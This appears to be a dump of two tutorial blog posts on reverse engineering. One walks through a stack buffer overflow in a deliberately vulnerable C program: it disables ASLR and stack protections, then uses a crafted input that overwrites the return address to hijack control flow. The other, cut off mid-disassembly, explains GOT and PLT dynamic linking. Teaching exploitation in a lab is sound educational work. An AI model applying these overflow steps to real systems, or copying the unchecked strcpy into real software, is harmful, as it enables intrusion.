[{"content":"Setting the Stage Today, we’re not just smashing buffers — we’re hijacking control flow with user input. Before we start our little \u0026ldquo;experiment,\u0026rdquo; let\u0026rsquo;s make sure the playground is\u0026hellip; accommodating. (Optional)\nASLR? 1 - That pesky troublemaker has to go.\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space Now the memory layout won’t jump around like a caffeinated squirrel. Let’s roll. 😏\nThe Vulnerable Program Here\u0026rsquo;s a simple CTF-style challenge: vuln.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; void secret_function() { printf(\u0026#34;You\u0026#39;ve called the secret function!\\n\u0026#34;); } void vulnerable_function(char *input) { char buffer[5]; strcpy(buffer, input); // Whoops, no bounds check! } int main(int argc, char **argv) { if (argc != 2) { printf(\u0026#34;Usage: %s \u0026lt;input\u0026gt;\\n\u0026#34;, argv[0]); return 1; } vulnerable_function(argv[1]); printf(\u0026#34;Done processing input.\\n\u0026#34;); return 0; } Compiling Without Protections Now we\u0026rsquo;ll compile this code into a machine readable format: elf.\nTo keep things\u0026hellip; delightfully fragile..\ngcc -o vuln vuln.c -fno-stack-protector -z execstack Delightfully fragile? (\u0026hellip;Why These Flags?) -fno-stack-protector: Removes the stack canary 2.\n-z execstack: Marks the stack as executable.\nBecause why not make life easier (for learning purposes only)!!\nSo… what the heck actually happens when I run this thing? Okay, quick version: when you run an ELF binary, Linux kicks things off with a system call to: int execve(const char *filename, char *const argv[], char *const envp[]) 3\u0026hellip;\n# strace ./vuln execve(\u0026#34;./vuln\u0026#34;, [\u0026#34;./vuln\u0026#34;], 0x7ffcd96818c0 /* 22 vars */) = 0 ... ... This call then passes the baton to another internal kernel function: static int load_elf_binary(struct linux_binprm *bprm) 4 5\nAnd just like that, Linux begins laying out the stage for your binary. The loader steps in, quietly pulling strings to bring ./vuln to life\u0026hellip;\nOnce execve is called, the kernel does the heavy lifting — it sets the scene, maps the memory, initializes the stack, and finally, passes control to the entrypoint of your program. A clean slate, ready for action.\n# readelf --file-header ./vuln ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1070 \u0026lt;-- [ THIS THING HERE ] Start of program headers: 64 (bytes into file) Start of section headers: 13736 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 14 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 Wanna see where the magic begins? Hit the binary with objdump and look for the entry point.\n# objdump -d ./vuln | grep 1070 0000000000001070 \u0026lt;_start\u0026gt;: Ah, but don’t be fooled — that’s not your main() flexing. What you’re seeing here is the true beginning: _start, the entry summoned by the linker/loader.\nIt\u0026rsquo;s the setup squad — the one that gets everything ready before your actual code runs.\nSo what’s the deal with this detour?\nWell, _start is the one pulling strings behind the scenes — it\u0026rsquo;s provided by the C runtime, and it sets up the whole environment. Only after that does it call your main() function, passing in argc, argv, and envp all nice and proper.\nAlright then, let\u0026rsquo;s start up gdb. You already know where to place the breakpoint — right where it matters (main function obviously). Once it hits, the rest of the experiment is yours to unfold. Simple, right?\ngdb\u0026gt; break main gdb\u0026gt; run gdb\u0026gt; print $rip $1 = (void (*)()) 0x555555555195 \u0026lt;main+4\u0026gt; gdb\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555191 \u0026lt;+0\u0026gt;: push rbp 0x0000555555555192 \u0026lt;+1\u0026gt;: mov rbp,rsp =\u0026gt; 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10 0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi 0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; 0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 0x00005555555551bf \u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; 0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax 0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; 0x00005555555551de \u0026lt;+77\u0026gt;: lea rax,[rip+0xe59] # 0x55555555603e 0x00005555555551e5 \u0026lt;+84\u0026gt;: mov rdi,rax 0x00005555555551e8 \u0026lt;+87\u0026gt;: call 0x555555555040 \u0026lt;puts@plt\u0026gt; 0x00005555555551ed \u0026lt;+92\u0026gt;: mov eax,0x0 0x00005555555551f2 \u0026lt;+97\u0026gt;: leave 0x00005555555551f3 \u0026lt;+98\u0026gt;: ret End of assembler dump. Let\u0026rsquo;s take a look at how the compiler really interprets what we write in C — the transformation from human-readable logic to cold, deterministic machine dance.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 // 0x0000555555555191 \u0026lt;+0\u0026gt;: push rbp // 0x0000555555555192 \u0026lt;+1\u0026gt;: mov rbp,rsp // 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10 // 0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi // 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi int main(int argc, char **argv) { // 0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 // 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; if (argc != 2) { // 0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] // 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] // 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax // 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b // 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax // 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 // 0x00005555555551bf \u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; printf(\u0026#34;Usage: %s \u0026lt;input\u0026gt;\\n\u0026#34;, argv[0]); // 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 // 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; return 1; } // 0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] // 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 // 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] // 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax // 0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; vulnerable_function(argv[1]); // 0x00005555555551de \u0026lt;+77\u0026gt;: lea rax,[rip+0xe59] # 0x55555555603e // 0x00005555555551e5 \u0026lt;+84\u0026gt;: mov rdi,rax // 0x00005555555551e8 \u0026lt;+87\u0026gt;: call 0x555555555040 \u0026lt;puts@plt\u0026gt; printf(\u0026#34;Done processing input.\\n\u0026#34;); // 0x00005555555551ed \u0026lt;+92\u0026gt;: mov eax,0x0 return 0; // 0x00005555555551f2 \u0026lt;+97\u0026gt;: leave // 0x00005555555551f3 \u0026lt;+98\u0026gt;: ret } Line number 3 \u0026ndash;\u0026gt; 0x0000555555555195 \u0026lt;+4\u0026gt;: sub rsp,0x10\nThis instruction creates space on the stack for local variables used inside the main function. It moves the stack pointer down by 0x10 (16 bytes), effectively reserving that much space between rbp and rsp.\nThis reserved stack space is where local variables will live — think of it as the function’s personal scratchpad. In this case, the compiler decides (because we programmed it) to save the incoming function arguments argc and argv onto this space:\n0x0000555555555199 \u0026lt;+8\u0026gt;: mov DWORD PTR [rbp-0x4],edi 0x000055555555519c \u0026lt;+11\u0026gt;: mov QWORD PTR [rbp-0x10],rsi The next few lines perform a sanity check: Is the correct number of arguments passed to the program?\n0x00005555555551a0 \u0026lt;+15\u0026gt;: cmp DWORD PTR [rbp-0x4],0x2 0x00005555555551a4 \u0026lt;+19\u0026gt;: je 0x5555555551cb \u0026lt;main+58\u0026gt; If the user didn’t pass exactly 0x2 argument, we take the failure route:\n0x00005555555551a6 \u0026lt;+21\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551aa \u0026lt;+25\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551ad \u0026lt;+28\u0026gt;: mov rsi,rax 0x00005555555551b0 \u0026lt;+31\u0026gt;: lea rax,[rip+0xe74] # 0x55555555602b 0x00005555555551b7 \u0026lt;+38\u0026gt;: mov rdi,rax 0x00005555555551ba \u0026lt;+41\u0026gt;: mov eax,0x0 0x00005555555551bf \u0026lt;+46\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551c4 \u0026lt;+51\u0026gt;: mov eax,0x1 0x00005555555551c9 \u0026lt;+56\u0026gt;: jmp 0x5555555551f2 \u0026lt;main+97\u0026gt; Otherwise — if the argument count is valid — we jump ahead and continue with the actual work \u0026ndash; calling vulnerable_function\n0x00005555555551cb \u0026lt;+58\u0026gt;: mov rax,QWORD PTR [rbp-0x10] 0x00005555555551cf \u0026lt;+62\u0026gt;: add rax,0x8 0x00005555555551d3 \u0026lt;+66\u0026gt;: mov rax,QWORD PTR [rax] 0x00005555555551d6 \u0026lt;+69\u0026gt;: mov rdi,rax 0x00005555555551d9 \u0026lt;+72\u0026gt;: call 0x55555555516f \u0026lt;vulnerable_function\u0026gt; Calling vulnerable_function Let’s drop another breakpoint — this time on vulnerable_function. Why? Because vibes. And also, it’s kinda important.\ngdb\u0026gt; break *vulnerable_function Since the \u0026ldquo;sanity check\u0026rdquo; needs to pass for the program to proceed into the vulnerable_function, we have to supply at least one argument besides the program name.\nSo yeah, we re-run the program with \u0026ldquo;abc\u0026rdquo; as the user input:\ngdb\u0026gt; run abc And this is what the disassembly of vulnerable_function looks like:\ngdb\u0026gt; disas vulnerable_function Dump of assembler code for function vulnerable_function: =\u0026gt; 0x000055555555516f \u0026lt;+0\u0026gt;: push rbp 0x0000555555555170 \u0026lt;+1\u0026gt;: mov rbp,rsp 0x0000555555555173 \u0026lt;+4\u0026gt;: sub rsp,0x20 0x0000555555555177 \u0026lt;+8\u0026gt;: mov QWORD PTR [rbp-0x18],rdi 0x000055555555517b \u0026lt;+12\u0026gt;: mov rdx,QWORD PTR [rbp-0x18] 0x000055555555517f \u0026lt;+16\u0026gt;: lea rax,[rbp-0x5] 0x0000555555555183 \u0026lt;+20\u0026gt;: mov rsi,rdx 0x0000555555555186 \u0026lt;+23\u0026gt;: mov rdi,rax 0x0000555555555189 \u0026lt;+26\u0026gt;: call 0x555555555030 \u0026lt;strcpy@plt\u0026gt; 0x000055555555518e \u0026lt;+31\u0026gt;: nop 0x000055555555518f \u0026lt;+32\u0026gt;: leave 0x0000555555555190 \u0026lt;+33\u0026gt;: ret End of assembler dump. This is what stack looks before and after the rbp is pushed in this context.\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8f8: 0x00005555555551de 0x00007fffffffea38 0x7fffffffe908: 0x00000002ffffea38 0x00007fffffffe9b0 0x7fffffffe918: 0x00007ffff7deb488 0x00007fffffffe960 0x7fffffffe928: 0x00007fffffffea38 0x0000000255554040 0x7fffffffe938: 0x0000555555555191 0x00007fffffffea38 0x7fffffffe948: 0x03061a2375dd9875 0x0000000000000002 0x7fffffffe958: 0x0000000000000000 0x00007ffff7ffd000 0x7fffffffe968: 0x0000555555557dd8 0x03061a2374fd9875 0x7fffffffe978: 0x03060a61cec39875 0x00007fff00000000 0x7fffffffe988: 0x0000000000000000 0x0000000000000000 gdb\u0026gt; x/20gx $rsp 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0x03061a2375dd9875 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 0x7fffffffe970: 0x03061a2374fd9875 0x03060a61cec39875 0x7fffffffe980: 0x00007fff00000000 0x0000000000000000 At the start of the function, we push the old rbp onto the stack — that\u0026rsquo;s our link to the previous stack frame. That address \u0026ndash; 0x00007fffffffe910 \u0026ndash; is now holding the old base pointer.\nRight after that, the function typically reserves space with something like sub rsp, 0x20. That’s 32 bytes of fresh stack space, prepped and ready for locals, temps, maybe even your buffer that’s about to get overflowed (👀).\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0x03061a2375dd9875 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 This instruction \u0026ndash;\u0026gt; mov qword ptr [rbp - 0x18], rdi \u0026ndash; stores the pointer address of passed argument (argv[1]) into the newly created stack buffer at rbp - 0x18 location\u0026hellip;The stack looks like this\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece8 0x7fffffffe8e0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xc52f50aa6574d516 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 # Verification gdb\u0026gt; x/s 0x00007fffffffece8 0x7fffffffece8: \u0026#34;abc\u0026#34; Now strcpy function takes this pointer value, copies bytes to the destination location ([rbp-0x5])\u0026hellip; At this point, the actual content of argv[1] is sitting in the stack — right there in that buffer. Depending on the length, it might look like a perfect fit…\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece8 0x7fffffffe8e0: 0x0000000000000000 0x0000636261000000 0x7fffffffe8f0: 0x00007fffffffe910 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xc52f50aa6574d516 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 # Verification gdb\u0026gt; x/s $rbp-0x5 0x7fffffffe8eb: \u0026#34;abc\u0026#34; What if we pass a bigger string ?? gdb\u0026gt; run abcdef Doing the same thing, but with a bigger string;big enough to overflow the buffer ( \u0026gt;5 chars )\nAnd now\u0026hellip; here’s the stack, post-overflow. This is the moment where structure gives way to chaos.\ngdb\u0026gt; x/20gx $rsp 0x7fffffffe8d0: 0x0000000000000000 0x00007fffffffece5 0x7fffffffe8e0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8f0: 0x00007fffffff0066 0x00005555555551de 0x7fffffffe900: 0x00007fffffffea38 0x00000002ffffea38 0x7fffffffe910: 0x00007fffffffe9b0 0x00007ffff7deb488 0x7fffffffe920: 0x00007fffffffe960 0x00007fffffffea38 0x7fffffffe930: 0x0000000255554040 0x0000555555555191 0x7fffffffe940: 0x00007fffffffea38 0xad2578063243f742 0x7fffffffe950: 0x0000000000000002 0x0000000000000000 0x7fffffffe960: 0x00007ffff7ffd000 0x0000555555557dd8 gdb\u0026gt; x/s $rbp-0x5 0x7fffffffe8eb: \u0026#34;abcdef\u0026#34; And see how easily, it changed the saved rbp value (0x00007fffffffe910) to 0x00007fffffff0066\n66 - ascii for \u0026lsquo;f\u0026rsquo; \u0026amp; 00 - null byte terminator; Rest 5 characters (abcde) are in the correct buffer/variable space\nAfter vulnerable_function returns, the rbp gets restored and now points to 0x00007fffffff0066. This becomes the new anchor for any variable access — everything’s calculated relative to this updated rbp.\ngdb\u0026gt; info frame Stack level 0, frame at 0x7fffffff0076: rip = 0x5555555551de in main; saved rip = 0x0 called by frame at 0x7fffffff007e Arglist at 0x7fffffff0066, args: Locals at 0x7fffffff0066, Previous frame\u0026#39;s sp is 0x7fffffff0076 Saved registers: rbp at 0x7fffffff0066, rip at 0x7fffffff006e Now let\u0026rsquo;s take even bigger string that overwrites more of this unprotected memory\u0026hellip;\ngdb\u0026gt; run abcdefghijklmnopqrstuvwxyz Cut to: the aftermath\n# Before strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd1 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x00007fffffffe900 0x00005555555551de 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x0f6d273242269d28 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 # After strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd1 0x7fffffffe8d0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8e0: 0x6d6c6b6a69686766 0x7574737271706f6e 0x7fffffffe8f0: 0x0000007a79787776 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x0f6d273242269d28 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 a classic stack overflow — and not just any overflow, but a textbook rip overwrite. Let\u0026rsquo;s break it down like an autopsy:\nEventually the program should crash because it can\u0026rsquo;t access 0x7574737271706f6e address\u0026hellip;leading to segmentation fault in OS!\ngdb\u0026gt; x $rip 0x7574737271706f6e: Cannot access memory at address 0x7574737271706f6e This brings us to the secret_function in vuln.c program\u0026hellip;\ngdb\u0026gt; disas secret_function Dump of assembler code for function secret_function: 0x0000555555555159 \u0026lt;+0\u0026gt;: push rbp 0x000055555555515a \u0026lt;+1\u0026gt;: mov rbp,rsp 0x000055555555515d \u0026lt;+4\u0026gt;: lea rax,[rip+0xea4] # 0x555555556008 0x0000555555555164 \u0026lt;+11\u0026gt;: mov rdi,rax 0x0000555555555167 \u0026lt;+14\u0026gt;: call 0x555555555040 \u0026lt;puts@plt\u0026gt; 0x000055555555516c \u0026lt;+19\u0026gt;: nop 0x000055555555516d \u0026lt;+20\u0026gt;: pop rbp 0x000055555555516e \u0026lt;+21\u0026gt;: ret End of assembler dump. Now imagine this: what if we shape our input just right… so that when vulnerable_function returns, it hands control not back to where it came from — but straight to 0x0000555555555159 (secret_function)?\n## abcde12341234YQUUUU ## [\u0026#39;a\u0026#39;, \u0026#39;b\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;d\u0026#39;, \u0026#39;e\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;3\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;3\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;0x59\u0026#39;, \u0026#39;0x51\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;, \u0026#39;0x55\u0026#39;] ## remember little-endian?! ## gdb\u0026gt; run abcde12341234YQUUUU # Before strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd8 0x7fffffffe8d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe8e0: 0x00007fffffffe900 0x00005555555551de 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x7fe849f3e90b379d 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 # After strcpy gdb\u0026gt; x/20gx $rsp 0x7fffffffe8c0: 0x0000000000000000 0x00007fffffffecd8 0x7fffffffe8d0: 0x0000000000000000 0x6564636261000000 0x7fffffffe8e0: 0x3433323134333231 0x0000555555555159 0x7fffffffe8f0: 0x00007fffffffea28 0x00000002ffffea28 0x7fffffffe900: 0x00007fffffffe9a0 0x00007ffff7deb488 0x7fffffffe910: 0x00007fffffffe950 0x00007fffffffea28 0x7fffffffe920: 0x0000000255554040 0x0000555555555191 0x7fffffffe930: 0x00007fffffffea28 0x7fe849f3e90b379d 0x7fffffffe940: 0x0000000000000002 0x0000000000000000 0x7fffffffe950: 0x00007ffff7ffd000 0x0000555555557dd8 And now, with rip pointing to 0x0000555555555159, the game changes. Even though main never explicitly called secret_function, we’ve bent the rules — and now it runs anyway. Just the way we like it.\ngdb\u0026gt; x/gx $rbp 0x3433323134333231: Cannot access memory at address 0x3433323134333231 gdb\u0026gt; x/gx $rsp 0x7fffffffe8e8: 0x0000555555555159 gdb\u0026gt; x/i 0x0000555555555159 0x555555555159 \u0026lt;secret_function\u0026gt;: push rbp gdb\u0026gt; c Continuing. You\u0026#39;ve called the secret function! Program received signal SIGILL, Illegal instruction. This gets the job done, sure… But man, it leaves the stack looking like a crime scene. We’ll clean that up next time.\nhttps://www.networkworld.com/article/966844/what-does-aslr-do-for-linux.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://ctf101.org/binary-exploitation/stack-canaries/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/tools/include/nolibc/sys.h#L286\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/fs/binfmt_elf.c#L825\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/v6.13.7/source/include/linux/binfmts.h#L18\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2025/04/intro-to-re-part-5/","summary":"Setting the Stage Today, we’re not just smashing buffers — we’re hijacking control flow with user input. Before we start our little \u0026ldquo;experiment,\u0026rdquo; let\u0026rsquo;s make sure the playground is\u0026hellip; accommodating. (Optional)\nASLR? 1 - That pesky troublemaker has to go.\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space Now the memory layout won’t jump around like a caffeinated squirrel. Let’s roll. 😏\nThe Vulnerable Program Here\u0026rsquo;s a simple CTF-style challenge: vuln.c\n#include \u0026lt;stdio.","title":"Intro to RE: C : part-5 [Stack Based Buffer Overflow]"},{"content":"Intro In earlier articles, we talked about various parts of an ELF file and the many steps needed to create an executable ELF file that can run on your computer.\n(Note: The steps are shown visually below; For the source code, check out the symbol table article in this series.)\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ ┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ After completing this process, we have an ELF executable called calc. However, we didn\u0026rsquo;t directly include any library that contains definitions for functions like printf or scanf, which we used in our main.c file to input and output data. So, how does that work?\nAnswer: Dynamic linking (which is a complex topic, so for this article, we\u0026rsquo;ll just cover the basics).\nIf you use the file command on the calc executable, it will display interesting information such as dynamically linked and interpreter /lib64/ld-linux-x86-64.so.2.\n\u0026gt; file calc calc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=65b929ceea26ea5e9fb8df1b15f2ab24b5c43ff6, for GNU/Linux 4.4.0, not stripped Before we move forward, let\u0026rsquo;s discuss some basics about libraries and how Linux manages them. Linux supports two types of libraries: static and shared.\nStatic libraries are connected to a program directly during the compile time (linking phase), while dynamic libraries (also known as shared libraries) are loaded when the application is launched, and all symbol resolutions and bindings are done at runtime.\nDynamic or shared libraries can be handled in two ways: Either you link your program with the shared library and let Linux load the library when the program runs (dynamic linking) 1, or you can design your application so that it loads the library from a specified path and then calls a particular function within that library (dynamic loading). 2\nNow, looking at our calc binary, it\u0026rsquo;s evident that we\u0026rsquo;re using dynamic linking to handle functions like printf and scanf (Since we are not loading any other library in out code). If you have any background in C programming, you\u0026rsquo;ve likely heard of the standard C library (libc) at least once. libc contains definitions for many standard functions used by many C programs, including printf and scanf, which we need in our calc executable.\nSo, when we run the calc executable, Linux will figure out which libraries it needs to run and load them into the process memory space. Once that\u0026rsquo;s done, it\u0026rsquo;ll load the calc executable and resolve all the dynamic symbols it contains.\nIn newer systems, this loading and resolving process is done lazily. This means that libraries will only load and resolve when there\u0026rsquo;s demand for a specific symbol. This approach is called lazy binding, and it helps speed up the loading of calc itself.\nSince symbol resolution happens at runtime, the address of the resolved symbol needs to be stored somewhere so that we don\u0026rsquo;t have to resolve it every time it\u0026rsquo;s needed.\nGOT (GLobal Offset Table) and PLT (Procedure Linkage Table) Let\u0026rsquo;s visualize our situation: We need the address of the printf function to make a call, but we don\u0026rsquo;t know where in the process memory space the libc library will load, so we can\u0026rsquo;t determine the exact address for printf.\nHow can we call printf then?\nOne naive method would be to load libc into the process memory space, find the exact address for printf using libc\u0026rsquo;s base address, and then modify the .text section of calc to update the placeholder address of printf with the exact address. This seems straightforward and will work. However, with this approach, we\u0026rsquo;ll have to load the library separately for each instance of calc or any other program that relies on libc. This isn\u0026rsquo;t efficient because it would mean having many copies of the same library in memory, unless the library is completely read-only and never modified.\nAnother approach is to add a level of redirection to the this method. In this newer approach, we patch the .got and/or .got.plt section (which contains the Global Offset Table) of calc. The idea is that when the library is loaded, the dynamic linker examines the relocation, finds the exact address of printf, and patches the .got and/or .got.plt entry as required. Then, the calc binary refers to these tables to point to the right place. This way, everything works seamlessly!\nWhat does PLT do here ??\nThe PLT (Procedure Linkage Table) adds another level of redirection that utilizes the .got.plt section to keep track of function jumps. Essentially, the Global Offset Table (GOT) is a list of addresses from the libc, while the PLT is another list of addresses used as placeholders in the .text section of the calc binary.\nBy utilizing this combination of the PLT and the .got.plt section, there\u0026rsquo;s no need to directly patch the .text section of the calc binary. This approach offers security benefits as it avoids modifying the executable code, which could potentially introduce vulnerabilities or trigger security mechanisms designed to detect such modifications.\nSecurity benifits ++\nAnalysis It will become clearer when we examine the disassembly (which is my favorite part).\nAs usual, we\u0026rsquo;ll disassemble main function first. We don\u0026rsquo;t have to check everything here, just focus on printf and scanf call instructions.\n0x000055555555518f \u0026lt;+38\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551b2 